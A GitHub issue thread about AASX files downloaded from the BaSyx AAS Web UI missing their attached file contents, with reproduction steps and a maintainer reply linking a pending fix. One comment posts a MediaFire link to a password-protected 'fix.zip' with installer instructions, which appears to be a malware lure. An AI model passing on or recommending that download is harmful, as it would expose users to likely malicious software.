### ISSUE TITLE
[BUG] Files content missing in downloaded AAS from AAS Web UI

### ISSUE THREAD

**Issue by JS-Aibel** [eclipse-basyx/basyx-applications#259]
**Describe the bug**
When downloading an AASX file from AAS Web UI, the AAS is missing its files content.
The files are shown in the AAS Web UI.
This may be related to issue https://github.com/eclipse-basyx/basyx-applications/issues/234

**To Reproduce**
1. Upload an AASX file in the AAS Web UI.
2. Notice that the files are attached and visible in the AAS Web UI.
3. Click Download on the AAS.
4. Open the downloaded AASX file locally.
5. Notice that for the Submodel Element (File)s, the values are set to "/tmp/basyx-temp..." and the content of the file is missing.

**Expected behavior**
Attachments/files should be included in the AASX file.

**BaSyx (please complete the following information):**
- BaSyx Version [v2.0]
- AAS Version [DotAAS V3]

**BaSyx configuration**
Default from the Quick Start Guide.

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aaronzi** [comment]
Hello @JS-Aibel,

this is actually related to this issue: https://github.com/eclipse-basyx/basyx-java-server-sdk/issues/353

There is already a pull request resolving this issue: https://github.com/eclipse-basyx/basyx-java-server-sdk/pull/399

We will provide an update including this fix soon.
